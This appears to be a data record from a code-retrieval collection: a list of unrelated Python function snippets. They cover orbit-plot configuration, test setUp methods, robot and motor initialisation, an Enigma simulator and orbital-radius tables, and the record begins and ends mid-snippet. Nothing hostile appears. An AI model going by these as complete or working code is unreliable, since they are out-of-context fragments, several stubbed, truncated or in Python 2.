'RVFile', fallback=None)\n OP.relAstfile = config.get('data_paths', 'AstrometryFile', fallback=None)\n OP.GaiaDataDir = config.get('data_paths', 'GaiaDataDir', fallback=None)\n OP.Hip2DataDir = config.get('data_paths', 'Hip2DataDir', fallback=None)\n OP.Hip1DataDir = config.get('data_paths', 'Hip1DataDir', fallback=None)\n OP.HGCAFile = config.get('data_paths', 'HGCAFile', fallback=None)\n \n #read in the mcmc chains\n OP.burnin = config.getint('plotting', 'burnin', fallback=0)\n OP.MCMCfile = config.get('plotting', 'McmcDataFile', fallback=None)\n \n # colorbar settings\n OP.usecolorbar = config.getboolean('plotting', 'use_colorbar', fallback=False)\n OP.color_map = config.get('plotting', 'colormap', fallback= 'viridis')\n OP.cmref = config.get('plotting', 'reference', fallback='msec_jup')\n\n # which planet to plot?\n OP.iplanet = config.getint('plotting', 'iplanet', fallback=0)\n \n # customized range of epochs\n OP.start_epoch = config.getfloat('plotting', 'start_epoch', fallback=1950)\n OP.end_epoch = config.getfloat('plotting', 'end_epoch', fallback=2030)\n \n # predicted epoch positions\n OP.predicted_ep = config.get('plotting', 'predicted_years', fallback=('2010,2020')).split(\",\")\n OP.predicted_ep_ast = config.getfloat('plotting', 'position_predict', fallback=2000)\n # how many random orbits\n OP.num_orbits = config.getint('plotting', 'num_orbits', fallback = 50)\n \n # step size\n OP.num_steps = config.getint('plotting', 'num_steps', fallback = 1000)\n \n # plot axes settings\n OP.set_limit = config.getboolean('plotting', 'set_limit', fallback=False)\n OP.user_xlim = config.get('plotting', 'xlim', fallback=None).split(\",\")\n OP.user_ylim = config.get('plotting', 'ylim', fallback=None).split(\",\")\n \n # show or not show title, add a text on the plot\n OP.show_title = config.getboolean('plotting', 'show_title', fallback=False)\n OP.add_text = config.getboolean('plotting', 'add_text', fallback=False)\n OP.text_name = config.get('plotting', 'text_name', fallback=None)\n OP.x_text = config.getfloat('plotting', 'x_text', fallback=None)\n OP.y_text = config.getfloat('plotting', 'y_text', fallback=None)\n \n # marker settings\n OP.marker_color = config.get('plotting', 'marker_color', fallback= 'coral')\n \n # plot which instrument for the RV plot, starting from 1,2 ... n\n OP.whichInst = config.get('plotting', 'RV_Instrument', fallback=False)\n \n # plot the two proper motion plots separately or together\n OP.pm_separate = config.getboolean('plotting', 'Proper_motion_separate_plots', fallback=False)\n \n #save data\n OP.save_params = config.getboolean('save_results', 'save_params', fallback=True)\n OP.err_margin = config.get('save_results', 'err_margin', fallback= ('0.16, 0.5, 0.84')).split(\",\")\n \n args = parse_args_plotting()\n OP.outputdir = args.output_dir\n\n # initialize the OP object\n OP.start()\n return OP", "def _setup_self(self, model_num =0):\n self.all_residues = self._setup_all_residues(model_num) #vector1 of Bio Residues\n self.pdb_info = self._setup_pdb_info() #PDBInfo to map the vector1\n self.peptide_bond_distances = self._setup_peptide_bond_distances() #map of bond distances to next residue in pose.", "def setUp(self):\n \n self.ReconstructionObj = Reconstruction(c, dX, dY, dXg, dYg, dXqg, dYqg, Xr, Yr, dXq, dYq, outx_cal, outy_cal, dXql, dYql, dWx, dWy, Wf1, W, Wrms, delta, yb, x_edge, z_basis, coeff, nz, mz, nn, a, b, a1, b1, theta, jx, jy, ma, xx, outx_l)\n\n self.c = self.ReconstructionObj.c\n self.dX = self.ReconstructionObj.dX\n self.dY = self.ReconstructionObj.dY\n self.dXg = self.ReconstructionObj.dXg\n self.dYg = self.ReconstructionObj.dYg\n self.dXqg = self.ReconstructionObj.dXqg\n self.dYqg = self.ReconstructionObj.dYqg\n self.Xr = self.ReconstructionObj.Xr\n self.Yr = self.ReconstructionObj.Yr\n self.dXq = self.ReconstructionObj.dXq\n self.dYq = self.ReconstructionObj.dYq\n self.outx_cal = self.ReconstructionObj.outx_cal\n self.outy_cal = self.ReconstructionObj.outy_cal\n self.dXql = self.ReconstructionObj.dXql\n self.dYql = self.ReconstructionObj.dYql\n self.dWx = self.ReconstructionObj.dWx\n self.dWy = self.ReconstructionObj.dWy\n self.Wf1 = self.ReconstructionObj.Wf1\n self.W = self.ReconstructionObj.W\n self.Wrms = self.ReconstructionObj.Wrms\n self.delta = self.ReconstructionObj.delta\n self.yb = self.ReconstructionObj.yb\n self.x_edge = self.ReconstructionObj.x_edge\n self.z_basis = self.ReconstructionObj.z_basis\n self.coeff = self.ReconstructionObj.coeff\n self.nz = self.ReconstructionObj.nz\n self.mz = self.ReconstructionObj.mz\n self.nn = self.ReconstructionObj.nn\n self.a = self.ReconstructionObj.a\n self.b = self.ReconstructionObj.b\n self.a1 = self.ReconstructionObj.a1\n self.b1 = self.ReconstructionObj.b1\n self.theta = self.ReconstructionObj.theta\n self.jx = self.ReconstructionObj.jx\n self.jy = self.ReconstructionObj.jy\n self.ma = self.ReconstructionObj.ma\n self.xx = self.ReconstructionObj.xx\n self.outx_l = self.ReconstructionObj.outx_l\n \n pass", "def Init(self):\n RobotMap.Init()\n from commands import *\n from subsystems import *\n#@autogenerated_code(\"constructors\", \" \")\n#parse(\"${exporter-path}core/robot-constructors.py\")\n#end\n # This MUST be here. If the OI creates Commands (which it very likely\n # will), constructing it during the construction of CommandBase (from\n # which commands extend), subsystems are not guaranteed to be\n # yet. Thus, their requires() statements may grab null pointers. Bad\n # news. Don't move it.\n self.oi = OI()\n\n # instantiate the command used for the autonomous period", "def initialize(self) -> None:\n # Set motors to stop, read encoder values for starting point\n self.drive.arcadeDrive(0, 0)\n self.drive.resetEncoders()", "def initialise(self):\n self.set_up()", "def test_init(self):\n # call function to test\n test_object = ScipyOdeSolver(integrator=self._integrator, **self._kwargs)\n assert test_object._solver is None\n assert test_object._solver_args == self._kwargs, 'unexpected additional arguments. Keep in mind None and {}.'\n assert test_object._integrator == self._integrator, 'unexpected initialization of integrate function'", "def robotInit(self):\n # Update constants from json file on robot\n Constants.updateConstants()\n # Robot odemetry command\n self.updateodemetry = updateodemetry.UpdateOdemetry()\n # Set command group member variables\n self.autonomous = autogroup.AutonomousCommandGroup()\n self.disabled = disabledgroup.DisabledCommandGroup()\n self.teleop = teleopgroup.TeleopCommandGroup()\n self.test = testgroup.TestCommandGroup()", "def initialisation(self):\n self.create_variables()\n self.create_placeholders()\n self.build_model()\n self.reset_lr(None, True)\n self.build_loss()\n self.initialised = True", "def initialise_sim(self):\n pass", "def __init__ (self, outdir, geometry, phasef, regen_velocity = True):\n ll.info (\"== setting up TauP\")\n\n self.outdir = outdir\n self.phasef = phasef\n self.set_geometry (geometry, regen_velocity)", "def setup():\n\n self.zorp_mock = Mock()\n\n for name, func in six.iteritems(self._get_zorp_mock_methods()):\n self.zorp_mock.server.registry.put(name, func)\n\n self.zorp_mock.start()", "def _setup_simulation(self\n ) -> None:\n pass", "def __initilization(self,node_set):\n \n print \"*********************************\"\n \n for x in node_set:\n x.node_vol=np.transpose(np.matrix([cmath.exp(0), cmath.exp(complex(0,math.pi*2/3)), cmath.exp(complex(0,-math.pi*2/3))]))\n \n print \"Forward/Backward Algorithm Initialization Done!\"", "def _setup_params(self) -> None:\n self.i = 0 # Year\n self.ela = self.ela_start # Equilibrium line altitude\n self.steady_state = False # Control variable for steady state\n self.fracd8_mode = \"limited\" # Mode of the fracd8 algorithm", "def initialise(self):", "def __init__(self):\n\n self.plugboard = None\n self.rotors = []\n self.reflector = None", "def GetUserSettings(self):\n \n # alphabet, notch, turnover, position, ringSetting\n # ABCDEFGHIJKLMNOPQRSTUVWXYZ\n self._rotor1 = rotor('EKMFLGDQVZNTOWYHXUSPAIBRCJ','Y','Q', 1, 1) #Create a default rotor I object\n self._rotor2 = rotor('AJDKSIRUXBLHWTMCQGZNPYFVOE','M','E', 1, 1) #Create a default rotor II object\n self._rotor3 = rotor('BDFHJLCPRTXVZNYEIWGAKMUSQO','D','V', 1, 1) #Create a default rotor III object\n self._rotor4 = rotor('ESOVPZJAYQUIRHXLNFTGKDCMWB','R','J', 1, 1) #Create a default rotor IV object\n self._rotor5 = rotor('VZBRGITYUPSDNHLXAWMJQOFECK','H','Z', 1, 1) #Create a default rotor V object\n \n self._UKWA = reflector('AE BJ CM DZ FL GY HX IV KW NR OQ PU ST') #Create a default A reflector object\n self._UKWB = reflector('AY BR CU DH EQ FS GL IP JX KN MO TZ VW') #Create a default B reflector object\n self._UKWC = reflector('AF BV CP DJ EI GO HY KR LZ MX NW QT SU') #Create a default C reflector object\n \n loopRotors = True\n while loopRotors == True: #While user input is invalid\n rotorL, rotorM, rotorR = input(\"\\nEnter rotor setup: \").upper().split() #Prompt the user to enter the rotor setup\n if rotorL == rotorM or rotorL == rotorR or rotorM == rotorR: #If the user has used the same rotor \n print('Rotors can not be the same. Try again.') #Inform them that they cannot use the same rotors and prompt again\n else:\n loopRotors = False #Otherwise continue with the program\n \n reflectorType = input(\"Enter reflector type: \").upper() #Prompt user to enter reflector type\n \n loopPlugboard = True\n while loopPlugboard == True: #While user input is invalid\n plugboardPairs = input('\\nEnter plugboard pairs: ').upper().strip() #Prompt user to enter plugboard pairs\n stringPairs = plugboardPairs.replace(\" \", \"\") #Remove any spaces\n \n if len(stringPairs) != 0: #If the user has entered plugboard pairs\n frequencies = collections.Counter(stringPairs) #Count the frequency of each character \n repeated = {}\n for k, v in frequencies.items(): #For every frequency pair\n if v > 1: #If there is more than one occurrence\n repeated[k] = v #Add it to the repeated dictionary\n if len(repeated) != 0: #If there are repeats in the repeated dictionary\n print('Each character may only connect to another character. Try again.') #Prompt the user to enter the plugboard pairs again\n loopPlugboard = True\n else:\n loopPlugboard = False #Otherwise continue with the program\n else:\n loopPlugboard = False #Continue with the program if there is not input for the plugboard pairs\n \n rotors = {'I':self._rotor1, 'II':self._rotor2, 'III':self._rotor3, 'IV':self._rotor4, 'V':self._rotor5} #Match each rotor type to their rotor object\n reflectors = {'A':self._UKWA, 'B':self._UKWB, 'C':self._UKWC} #Match each reflector type to their reflector object\n \n self._rotorL = rotors.get(rotorL) #Assign the corresponding rotor object to the rotor\n self._rotorM = rotors.get(rotorM)\n self._rotorR = rotors.get(rotorR)\n \n self._UKW = reflectors[reflectorType] #Assign the corresponding reflector object to the reflector\n \n self._plugboard = plugboard(plugboardPairs) #Assign the corresponding plugboard object to the plugboard", "def orbit_index():\n return OrbitController.invoke(OUTPUT_DIRECTORY)", "def antenny_init_components(self):\n if self.antenny_config is None:\n print(\"Please load a config before initializing components\")\n if not self.antenny_config.check():\n print(\"Config {} is not valid, failed to initialize\".format(self.antenny_config.get_name()))\n print(\"If you believe this is an error, or you have modified the base components of the antenny board, \"\n \"please check Config class as well as the default configs for more details.\")\n\n self.imu_init()\n self.pwm_controller_init()\n self.elevation_servo_init()\n self.azimuth_servo_init()\n self.screen_init()\n self.gps_init()\n self.telemetry_init()\n self.platform_init()", "def setupTown(self):\n\t\t# create a test square to determine participant distance\n\t\tself.vr.resetEnvironment()\n\t\t\n\t\tself.vr.addSkyBox(self.config.blackImage)\n\t\tself.vr.addFloorBox(0.0, -1.0, 0.0, self.config.unitScale, self.config.unitScale, self.config.unitScale,\n\t\t\t\t\t\tself.config.blackImage, None, self.config.blackImage, None)\n\t\tself.vr.setGravity(0.0, -0.1, 0.0)\n\t\tself.vr.addPlaneGeom(0.0, 1.0, 0.0, 0.0, mu = 0.0)\n\t\tself.vr.addBuildingBox(0.0, 0.95, -0.5, self.config.whiteImage, 0.1, 0.1)", "def setup_simulation(self, **kwargs):\n\n self.distance = self.config[\"site\"][\"distance\"]\n self.num_substations = self.config[\"num_substations\"]\n\n self.initialize_substructure_production()\n self.initialize_installation_vessel()", "def setUp(self):\n\n self.eps = 0.001 # Accept 0.1 % relative error\n\n self.RSISE = Point(-35.27456, 149.12065)\n self.Home = Point(-35.25629, 149.12494) # 28 Scrivener Street, ACT\n self.Syd = Point(-33.93479, 151.16794) # Sydney Airport\n self.Nadi = Point(-17.75330, 177.45148) # Nadi Airport\n self.Kobenhavn = Point(55.70248, 12.58364) # Kobenhavn, Denmark\n self.Muncar = Point(-8.43, 114.33) # Muncar, Indonesia", "def _setup(self):\n\n # Get user data\n self.symbols = self._get_symbols()\n self.data_dict = self._get_data()\n self.portfolio = self.initialize_portfolio()\n\n if 'slippage' in self.portfolio:\n self.slippage = self.portfolio['slippage']\n else:\n self.slippage = None\n\n # Keep track of all trades\n self.trade_manager = TradeManager(\n self.symbols, self.portfolio, self.sql_config\n )\n\n # Initialize state variables that are updated each iteration\n self.date = None\n self.data = None\n self.symbol = None\n self.currency = None\n self.last_buy = None\n self.num_unresolved = 0\n self.unresolved_trade = False", "def setUp(self):\n self.iv1 = Interval(1, 10)\n self.iv2 = Interval(5, 15)\n self.iv1_r = Interval(10, 1)\n self.iv2_r = Interval(15, 5)\n self.iv3 = Interval(3, 8)\n self.iv4 = Interval(11, 20)", "def __init__(self):\n GPIO.setwarnings(False)\n GPIO.cleanup() # Reset the high and low levels of the GPIO port\n #The following code defines the GPIO used to control the L298N chip. This definition is different for different Raspberry Pi driver boards.\n self.Motor_A_EN = 17\n self.Motor_B_EN = 4\n self.Motor_A_Pin1 = 27\n self.Motor_A_Pin2 = 18\n self.Motor_B_Pin1 = 21\n self.Motor_B_Pin2 = 26\n self.setup()", "def set_projectors(self, projectors):\n assert len(\n projectors\n ) == self.nwann, \"The number of projectors != number of wannier functions\"\n self.projectors = projectors", "def configure(self):\n super(ProjectionMatrix, self).configure()\n if self.sensors is None:\n self.sensors = self.skin_air.sensors\n\n if isinstance(self.sensors, sensors_module.SensorsEEG):\n self.skin_air.sensors = self.sensors\n self.skin_air.sensors_to_surface, self.skin_air.sensor_locations = self.sensors.sensors_to_surface(self.skin_air)\n\n # Create OpenMEEG objects from TVB objects.\n self.om_head = self.create_om_head()\n self.om_sources = self.create_om_sources()\n self.om_sensors = self.create_om_sensors()\n\n # Calculate based on type of sources\n if isinstance(self.sources, surfaces_module.Cortex):\n self.om_source_matrix = self.surface_source() #NOTE: ~1 hr\n elif isinstance(self.sources, connectivity_module.Connectivity):\n self.om_source_matrix = self.dipole_source()\n\n # Calculate based on type of sensors\n if isinstance(self.sensors, sensors_module.SensorsEEG):\n self.om_head2sensor = self.head2eeg()\n elif isinstance(self.sensors, sensors_module.SensorsMEG):\n self.om_head2sensor = self.head2meg()\n if isinstance(self.sources, surfaces_module.Cortex):\n self.om_source2sensor = self.surf2meg()\n elif isinstance(self.sources, connectivity_module.Connectivity):\n self.om_source2sensor = self.dip2meg()\n\n #NOTE: ~1 hr\n self.om_inverse_head = self.inverse_head(inv_head_mat_file = \"hminv_uid\")", "def load_orbit(data):\n\n type = data[\"type\"]\n if type == \"circular\":\n radius = data[\"radius\"]\n orbital_period = data[\"orbital_period\"] * dts\n inclination = data[\"inclination\"]\n return CircularOrbit(radius, orbital_period, inclination)\n elif type == \"elliptic\":\n apoapsis = data[\"apoapsis\"]\n periapsis = data[\"periapsis\"]\n longtitude_ascending_node = data[\"longtitude_ascending_node\"]\n argument_of_periapsis = data[\"argument_of_periapsis\"]\n inclination = data[\"inclination\"]\n initial_mean_anomaly = data[\"initial_mean_anomaly\"]\n multiplier = data[\"multiplier\"]\n return EllipticOrbit(apoapsis, periapsis, longtitude_ascending_node, argument_of_periapsis, inclination, initial_mean_anomaly=initial_mean_anomaly, multiplier=multiplier)\n else:\n raise TypeError(\"type \" + type + \" is invalid\")", "def _setup_world(self, taskname):\n self.x0 = self._hyperparams[\"x0\"]\n self._world = [gym.make(taskname)\n for _ in range(self._hyperparams['conditions'])]", "def setup(self):\n # if not system.restore_snapshot():\n # self.log.debug(\"No snapshot to restore, if this is not expected please contact automation team\")\n crindsim.set_mode(\"manual\")\n pos.connect()\n pos.sign_on()", "def init():\n global balls, super_balls\n\n balls = [gen_ball() for _ in range(number_of_balls)]\n super_balls = []\n generate_velocity_all_balls()", "def get_orbitals(self, q_numbers, exponents, coefficients, r):\n # Begin by calculating the values of the Slater function, and its first 2 derivatives\n # for the given exponents.\n # gives (n, r) dimension [where n is number of functions]\n f = self.G(q_numbers, exponents, r)\n df = self.DG(q_numbers, exponents, r, f)\n ddf = self.DDG(q_numbers, exponents, r, f)\n\n # Now construct the orbitals by multiplication with orbital coefficients\n of = np.einsum('ij,jk->ik', coefficients, f) # (i=orbital, j=function, k=r)\n dof = np.einsum('ij,jk->ik', coefficients, df)\n ddof = np.einsum('ij,jk->ik', coefficients, ddf)\n return of, dof, ddof", "def auto_setup(self):\n if self.mot_type == \"xps8p\":\n return\n if self.get_par(\"err_sevr\") == 3:\n print \"Reinitializing motor {}...\".format(self.name)\n self.reinit()\n ok = self.wait_par(\"err_sevr\", 3, match_value=False, timeout=20)\n if ok:\n print \"Successfully reinitialized {}.\".format(self.name)\n time.sleep(0.5)\n else:\n print \"Reinitializing {} timed out. Aborting auto_setup.\".format(self.name)\n return\n\n for i in range(3):\n for clear, name in ((self.clear_pu, \"powerup\"),\n (self.clear_stall, \"stall flag\"),\n (self.clear_error, \"error flag\")):\n clear(check=True, wait=False)\n\n ok = []\n for bit, mask in ((RA_POWERUP, 1), (RA_STALL, 1), (RA_ERR, RA_ERR_MASK)):\n ok.append(self._wait_msta_bit(bit, 0, mask, timeout=10))\n if not all(ok):\n print \"Issues with clearing flags for {}\".format(self.name)\n\n try: # Not every environment has pmgr access\n self.pmgr.apply_config(dumb_config=self.name)\n except:\n pass", "def on_initialize_corridors_button_clicked(self):\n if self.qr_polytraj is None or self.corridors_init is True:\n return\n\n map = self.check_for_map()\n if map is None:\n return\n\n # Get minimum distance for each segment\n l_max = self.compute_nearest_distance_to_obstacles(self.qr_polytraj.waypoints)\n\n # find the segments currently in collision\n collision_segs = self.find_segments_in_collision()\n\n for i in range(self.qr_polytraj.n_seg):\n if i in collision_segs or self.all_corridors:\n # For each segment in collision\n self.add_corridor_constraint(i,l_max[i],weight=100.0)\n\n\n if not self.defer:\n self.qr_polytraj.run_astro(replan=True)\n self.update_path_markers()\n acc_wp = self.get_accel_at_waypoints(\"main\")\n # self.interactive_marker_worker.make_controls(self.qr_polytraj.waypoints)\n self.interactive_marker_worker.update_controls(self.qr_polytraj.waypoints,acc_wp = acc_wp)\n\n self.corridors_init = True", "def orbit(*args, horizontalAngle: float=0.0, pivotPoint: List[float, float, float]=None,\n rotationAngles: List[float, float]=None, verticalAngle: float=0.0, **kwargs)->None:\n pass", "def getorbit(sat, tfinal, tstep, trec):\n ntimes = (int)(tfinal/tstep)\n n_tvals = (int)(tfinal/trec)\n state_arr = np.zeros((6, n_tvals))\n orbelem_arr = np.zeros((6, n_tvals))\n s_major_arr = np.zeros(n_tvals)\n count = 0\n for i in range(ntimes):\n sat.rk4_step_sat(tstep)\n if i % (trec/tstep) == 0:\n state_arr[:, count] = sat.getstate()\n orbelem_arr[:, count] = sat.orb_elem()\n s_major_arr[count] = sat.get_a()\n tether = sat.get_tether()\n tether.setlamda_a(sat)\n tether.set_iv(sat)\n print state_arr[0, count]\n print count\n count += 1\n return (state_arr, orbelem_arr, s_major_arr)", "def _init_system(*args):\n __set_time_elements(args[0], args[1])\n __set_control_elements(args[0], args[2], args[3])\n __set_sensor_elements(args[0], args[4], args[5], args[6], args[7])", "def __init__(self, gameMap, initDirec=None, initBodies=None, initTypes=None):\n\t\tself._map = gameMap\n\t\tself._initDirec = initDirec\n\t\tself._initTypes = initTypes\n\t\tself._initBodies = initBodies\n\t\tself.reset(False)", "def init():\n print(\"initializing...\")\n print(\"setting relays off\")\n for pin in PINS:\n GPIO.setup(pin, GPIO.OUT)\n GPIO.output(pin, RELAYOFF)", "def __init__(self, planes, cosmology):\r\n self.planes = planes\r\n self.plane_redshifts = [plane.redshift for plane in planes]\r\n self.cosmology = cosmology", "def __init__(self):\n self.RRTFamilySolver = RRTFamilyPathPlanner()\n self.PRMSolver = PRMPathPlanner()", "def setupWidget(self):\r\n self.generateCoordinates()\r\n self.modifyCoordinateLists()\r\n self.settings.movementMatrix = self.movementMatrix\r\n self.settings.ghostIntersectionList = self.ghostIntersectionList\r\n self.createBodies()\r\n print(\"GameW set\")", "def test_ocean() -> None:\n cfg = load_config()\n setup = ModelSetup(str(TEST_DIREC), cfg)\n ocean = Ocean(cfg, setup)\n ocean.compile_all()\n if cfg.run:\n ocean.run_all()\n if cfg.animate:\n ocean.animate_all()", "def autonomousInit(self):\n fieldState = self.driverStation.getGameSpecificMessage()\n self.fieldState = fieldState\n self.smartDashboard.putString(\"field state\", fieldState)\n fieldPosition = self.smartDashboard.getString(\"field position\", \"\")\n self.startingFieldPosition = self.parserobotFieldPosition(fieldPosition)\n self.smartDashboard.putNumber(\"position\", self.startingFieldPosition)\n \n #convert field states to our enum values \n self.ourSwitchSide = self.parserobotFieldPosition(self.fieldState[0])\n self.scaleSide = self.parserobotFieldPosition(self.fieldState[1])\n self.theirSwitchSide = self.parserobotFieldPosition(self.fieldState[2])\n if self.startingFieldPosition==self.kNothing:\n print(\"No field position set. Aborting\")\n return \n \n \n #self.Encoder.setMaxPeriod(.1)\n #self.Encoder.setMinRate(10)\n #self.Encoder.setDistancePerPulse(5)\n #self.Encoder.setReverseDirection(True)\n #self.Encoder.getDistance()\n \n \"\"\"self.Encoder.reset()\n while (self.Encoder.get() < value):\n drive\n delay\"\"\"\n \n \n \n \n \n \n \n #self.Encoder.getRawAxis()\n \n \n #todo change RRR to from fms, maybe parse it first\n \n self.autonomousProgram = commands.autonomousCommand.AutonomousProgram(self.startingFieldPosition)\n self.autonomousProgram.start()", "def init(self):\n self.focus_modes = []\n for focus_mode in self['focusModes']:\n self.focus_modes.append(\\\n {'modeName': focus_mode.modeName,\n 'lensCombination': eval(focus_mode.lensCombination),\n 'lensModes': eval(focus_mode.lensModes),\n 'size': eval(focus_mode.size),\n 'message': eval(focus_mode.message),\n 'diverg': eval(focus_mode.divergence)})\n self.focus_motors_dict = {}\n\n focus_motors = []\n focus_motors = eval(self.getProperty('focusMotors'))\n\n for focus_motor in focus_motors:\n self.focus_motors_dict[focus_motor] = []\n\n #TODO\n self.motors_groups = [self.getObjectByRole(\"P14ExpTbl\"),\n self.getObjectByRole(\"P14KB\"),\n self.getObjectByRole(\"P14DetTrans\"),\n self.getObjectByRole(\"P14BCU\"),\n self.getObjectByRole(\"slitsMotors\")]\n \n\n if len(self.motors_groups) > 0:\n for motors_group in self.motors_groups:\n self.connect(motors_group,\n 'mGroupFocModeChanged',\n self.motor_group_focus_mode_changed)\n else:\n logging.getLogger(\"HWR\").debug('BeamFocusing: No motors defined')\n self.active_focus_mode = self.focus_modes[0]['modeName']\n self.size = self.focus_modes[0]['size']\n self.update_values()\n\n self.cmd_set_calibration_name = self.getCommandObject(\\\n 'cmdSetCallibrationName')\n try:\n self.cmd_set_phase = eval(self.getProperty('setPhaseCmd'))\n except:\n pass", "def setup(self):\n\n for row_pin in keypad_row_pins:\n #Set up row-pins\n self.gpio.setup(row_pin, self.gpio.OUT)\n\n for col_pin in keypad_col_pins:\n #Set up col-pins\n self.gpio.setup(col_pin, self.gpio.IN)", "def test_initialisation(self):\n currency_endowment = {\"FET\": 100}\n good_endowment = {\"good_id\": 2}\n self.ownership_state.init(\n amount_by_currency_id=currency_endowment,\n quantities_by_good_id=good_endowment,\n )\n assert self.ownership_state.amount_by_currency_id is not None\n assert self.ownership_state.quantities_by_good_id is not None\n assert self.ownership_state.is_initialized", "def __init__(self, x_traj=[], y_traj=[], period=0, num_div_action=5,\n closed=True, differential_car=True, discrete_input=False):\n\n # Size of the space\n self.max_x = SPACE_X / 2 # [m]\n self.max_y = SPACE_Y / 2 # [m]\n self.state = []\n self.x_trajectory = x_traj\n self.y_trajectory = y_traj\n self.r= 0.0325 # [m] wheel´s radius\n self.rho = 0.133 # [m] distance between wheel\n self.time = period # frames per second\n\n # More steps for Ackerman model because circuit is longer\n if discrete_input:\n self.max_steps = 600\n else:\n self.max_steps = 600\n\n self.constant = -0.1\n self.x_ant = 0.0\n self.y_ant = 0.0\n # Sqr of the limit distance\n self.zone_0_limit = ZONE0_LIMIT\n self.zone_1_limit = ZONE1_LIMIT\n self.zone_2_limit = ZONE2_LIMIT\n if discrete_input:\n self.zone_2_limit = 0.08\n else:\n self.zone_2_limit = ZONE2_LIMIT\n\n self.num_div_action = num_div_action\n self.num_div_state = num_div_action\n\n # It is to inform if it´s an closed circuit without ending\n self.closed = closed\n\n # Distance between axis in Ackerman car\n self.l_ack = 0.245\n # Radius of wheels of the Ackerman car\n self.r_ack = 0.035\n # Maximum angle of the wheels of the Ackerman car\n self.alpha_ack = 25.34*np.pi/180\n\n # Choose car model\n self.differential_car = differential_car\n\n self.discrete_input = discrete_input\n\n # parameters to add noise to x, y, angle values\n # self.mu = 0\n # self.sigmaxy = 0.002\n # self.sigmaangle = 2*np.pi/180", "def __init__(self, front_left_wheel, front_right_wheel,\n\t\t\t\t rear_left_wheel, rear_right_wheel):\n\t\tself._front_left_wheel = front_left_wheel\n\t\tself._front_right_wheel = front_right_wheel\n\t\tself._rear_left_wheel = rear_left_wheel\n\t\tself._rear_right_wheel = rear_right_wheel", "def setup_class(self):\n args = {'pdb_path':'/sdf/home/a/apeck/tomoxtal/examples/input/193l.pdb', 'resolution':6.0, 'size':250}\n\n # generate structure factors and retrieve associated cell information\n sf = cctbx_tools.reference_sf(args['pdb_path'], args['resolution'], expand_to_p1=True)\n sf_data = cctbx_tools.reformat_sf(sf)\n sg_symbol, sg_no, self.cell, cs = cctbx_tools.unit_cell_info(args['pdb_path'])\n \n # add random phase shifts\n hklIp1, hklIp2, hklIp3 = sf_data.copy(), sf_data.copy(), sf_data.copy()\n hklIp2[:,-1], self.shifts2 = phases_utils.add_random_phase_shift(sf_data[:,:3], sf_data[:,-1])\n hklIp3[:,-1], self.shifts3 = phases_utils.add_random_phase_shift(sf_data[:,:3], sf_data[:,-1])\n\n # retain subset of Millers\n for data in [hklIp1,hklIp2,hklIp3]:\n keep_idx = np.unique(np.random.randint(0, high=data.shape[0], size=args['size']))\n data = data[keep_idx]\n \n self.data1, self.data2, self.data3 = hklIp1, hklIp2, hklIp3\n fshifts_list = np.random.uniform(size=(4,3))\n self.fshifts_list = np.vstack((fshifts_list, 1-self.shifts2, 1-self.shifts3))", "def setup(self):\n for lane in self.lanes.values():\n for p in range(lane.starting_patrons):\n patron = Patron(\n lane=lane,\n lane_speed=self.patron_speed,\n pause_duration=self.patron_pause,\n )\n\n patron.pos = patron.pos[0], patron.pos[1] + 15\n lane.puck_area.add_widget(patron)\n lane.patrons.append(patron)", "def init_motors(self):\n # self.maxVelocity = 576# -> 5 m/s\n # self.maxTorque = 30\n\n # motor init\n for m in self.motors:\n m.setPosition(float('inf'))\n m.setVelocity(1.)\n\n # Propeller PID control params tunned with Ziegler–Nichols PID\n K_u = 150.\n T_u = 342.857 / 1000. # ms\n # no overshoot\n params_roll = {'P': K_u / 5., 'I': (2. / 5.) * K_u / T_u,\n 'D': K_u * T_u / 15., 'sp': 0.}\n self.rollPID = PID(params_roll['P'], params_roll['I'],\n params_roll['D'], setpoint=params_roll['sp'],\n output_limits=(-2., 2.), sample_time=self.deltaT)\n\n K_u = 150.\n T_u = 682.66 / 1000. # ms\n # no overshoot\n params_pitch = {'P': K_u/5.,\n 'I': (2. / 5.) * K_u / T_u,\n 'D': K_u*T_u/15.,\n 'sp': 0.}\n self.pitchPID = PID(params_pitch['P'], params_pitch['I'],\n params_pitch['D'], setpoint=params_pitch['sp'],\n output_limits=(-2., 2.), sample_time=self.deltaT)\n K_u = 20.\n T_u = 1621.33 / 1000. # ms\n # PD\n params_yaw = {'P': 0.8 * K_u,\n 'I': 0.,\n 'D': K_u * T_u / 10.,\n 'sp': self.target_yaw}\n self.yawPID = PID(params_yaw['P'], params_yaw['I'], params_yaw['D'],\n setpoint=params_yaw['sp'], output_limits=(-2., 2.),\n sample_time=self.deltaT, error_map=pi_clip)\n\n K_u = 20.\n T_u = 2668.8 / 1000. # ms\n # PD\n params_vert = {'P': 0.8 * K_u,\n 'I': 0.,\n 'D': K_u * T_u / 10.,\n 'sp': self.target_altitude}\n self.vertPID = PID(params_vert['P'], params_vert['I'],\n params_vert['D'], setpoint=params_vert['sp'],\n output_limits=(-5., 5.), sample_time=self.deltaT)\n\n return True", "def initial_conditions(self):\n e = self.get_property_all_planets('e')\n pi = self.get_property_all_planets('pi')*np.pi/180\n i = self.get_property_all_planets('i')*np.pi/180\n omega = self.get_property_all_planets('Omega')*np.pi/180\n\n h = np.array(e*np.sin(pi), dtype='complex128')\n k = np.array(e*np.cos(pi), dtype='complex128')\n p = np.array(i*np.sin(omega), dtype='complex128') # WHY DIVIDE BY 2 TO MATCH LASKAR 1986\n q = np.array(i*np.cos(omega), dtype='complex128')\n\n return h, k, p, q", "def _orbital_radii():\n return { \"Li\":( 0.985, 0.625 ), \n \"Be\":( 0.64, 0.44 ), \n \"B\":( 0.48, 0.315 ), \n \"C\":( 0.39, 0.25 ), \n \"N\":( 0.33, 0.21 ), \n \"O\":( 0.285, 0.18 ), \n \"F\":( 0.25, 0.155 ), \n \"Ne\":( 0.22, 0.14 ), \n \n \"Na\":( 1.10, 1.55 ), \n \"Mg\":( 0.90, 1.13 ), \n \"Al\":( 0.77, 0.905 ), \n \"Si\":( 0.68, 0.74 ), \n \"P\":( 0.60, 0.64 ), \n \"S\":( 0.54, 0.56 ), \n \"Cl\":( 0.50, 0.51 ), \n \"Ar\":( 0.46, 0.46 ), \n \n \"K\":( 1.54, 2.15, 0.37 ),\n \"Ca\":( 1.32, 1.68, 0.34 ),\n \"Sc\":( 1.22, 1.53, 0.31 ),\n \"Ti\":( 1.15, 1.43, 0.28 ),\n \"V\":( 1.09, 1.34, 0.26 ),\n \"Cr\":( 1.07, 1.37, 0.25 ),\n \"Mn\":( 0.99, 1.23, 0.23 ),\n \"Fe\":( 0.95, 1.16, 0.22 ),\n \"Co\":( 0.92, 